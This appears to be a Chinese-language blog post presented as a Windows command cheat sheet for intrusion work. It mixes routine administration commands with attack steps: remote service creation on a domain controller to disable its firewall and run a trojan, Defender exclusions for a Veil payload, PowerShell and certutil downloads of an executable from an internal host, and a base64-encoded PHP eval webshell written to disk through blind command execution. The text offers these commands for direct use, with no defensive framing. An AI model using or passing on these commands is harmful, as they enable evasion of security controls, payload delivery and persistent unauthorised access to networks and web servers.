Windows 命令备忘录
2022-04-03 21:05:51

netsh 关闭防火墙

netsh advfilewall set publicprofile state off
netsh advfirewall set allprofiles state off

netsh 端口转发

# 开启转发
netsh interface portproxy add v4tov4 listenaddress=LOCAL_ADDRESS listenport=LOCAL_PORT connectaddress=DEST_ADDRESS connectport=DEST_PORT

# 查看存在的转发
netsh interface portproxy show all

# 删除指定规则
netsh interface portproxy delete v4tov4 listenport=LOCAL_PORT listenaddress=LOCAL_ADDRESS

sc 创建服务

基本用法

sc create <SERVICE_NAME> binpath= "<COMMAND>"
sc description <SERVICE_NAME>   "DESCRIPTION" 设置服务的描述字符串 
sc config <SERVICE_NAME>   start= auto  设置这个服务为自动启动 
net start <SERVICE_NAME>   启动服务

可以通过 IPC 连接在远程主机上创建服务

# 关闭域控防火墙
sc \\\\DC create wall binpath= "netsh advfirewall set allprofiles state off"
sc \\\\DC start wall
# 执行木马
sc \\\\DC create shell binpath= "c:\\shell.exe"
sc \\\\DC start shell

开关 3389 端口

# 开启
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# 关闭
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

开关 RDP

# 开启
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
# 关闭
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0

锁屏

Rundll32.exe user32.dll,LockWorkStation

certutil

certutil.exe -urlcache -split -f [URL] output.file

# base64解码
certutil.exe -decode encode.file decode.file

查询 Defender 白名单路径

reg query "HKLM\SOFTWARE\Microsoft\windows Defender\Exclusions\Paths"

修改 Defender 白名单

Add-MpPreference -ExclusionPath "C:\Utils" # 添加白名单路径
Add-MpPreference -ExclusionExtension "C:\Utils\veil.exe" # 添加白名单程序

PowerShell 下载远程文件

powershell (new-object Net.WebClient).DownloadFile('http://192.168.93.100:8000/win.exe','C:\win.exe')

替换文件中部分内容并写入到原文件

powershell ((cat C:\Users\administrator\Desktop\info.txt) -replace 'somethings', 'anothor things') | set-content -path C:\Users\administrator\Desktop\info.txt

PowerShell 中使用其他用户身份执行命令

$passwd = ConvertTo-SecureString "PASSWORD" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("DOMAIN\USERNAME", $passwd)

# 执行命令
Invoke-Command -computername localhost [-ConfigurationName dc_manage] -credential $cred -command {whoami}
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}

查找指定文件

递归查询 C 盘下 index.html 文件路径

dir /s /b c:\index.html

对于无回显 RCE 的 Web 机器，可以配合该命令将命令执行结果写入到文件中，达到半回显效果

写入命令执行结果

for /f %i in ("dir /s /b c:\index.html") do (whoami > %i\..\whoami.txt)

写入一句话马

for /f %i in ('dir /s /b c:\1.jpg') do (echo PD9waHAgZXZhbCgkX1JFUVVFU1RbMV0pOyA/Pgo= > %i\..\base64.txt)
for /f %i in ('dir /s /b c:\base64.txt') do (certutil.exe -decode %i\..\base64.txt %i\..\1.php)